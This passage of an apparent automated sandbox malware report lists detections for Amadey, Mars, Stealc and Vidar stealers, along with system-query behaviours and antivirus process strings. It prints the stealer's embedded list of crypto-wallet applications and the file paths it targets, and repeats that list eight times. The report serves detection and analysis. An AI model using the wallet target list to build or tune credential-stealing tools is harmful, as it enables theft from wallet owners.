Source: 06f6d9547f.exe, 0000000F.00000000.2760041133.0000000000762000.00000002.00000001.01000000.0000000F.sdmp, 06f6d9547f.exe.13.dr, random[1].exe0.13.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CFBAKEHIEB.exe, CFBAKEHIEB.exe, 00000007.00000002.2503519634.0000000000569000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: xProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B341 cpuid 0_2_6C58B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5535A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C5535A0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00646590 LookupAccountNameA, 13_2_00646590
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 12.2.explorti.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.explorti.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CFBAKEHIEB.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorti.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000003.2463090610.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2536047263.0000000000641000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3240531583.0000000000641000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2675197163.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2503437125.0000000000371000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2491110423.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2531523803.0000000000641000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2495081397.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.0244247334.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2449562218.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3054902462.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000E.00000002.3055852446.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0244247334.exe PID: 4320, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.0244247334.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2449562218.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3054902462.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3472, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2450878675.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 9C680Q69ers\user\AppData\Roaming\Electrum-LTC\wallets\*.**O
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
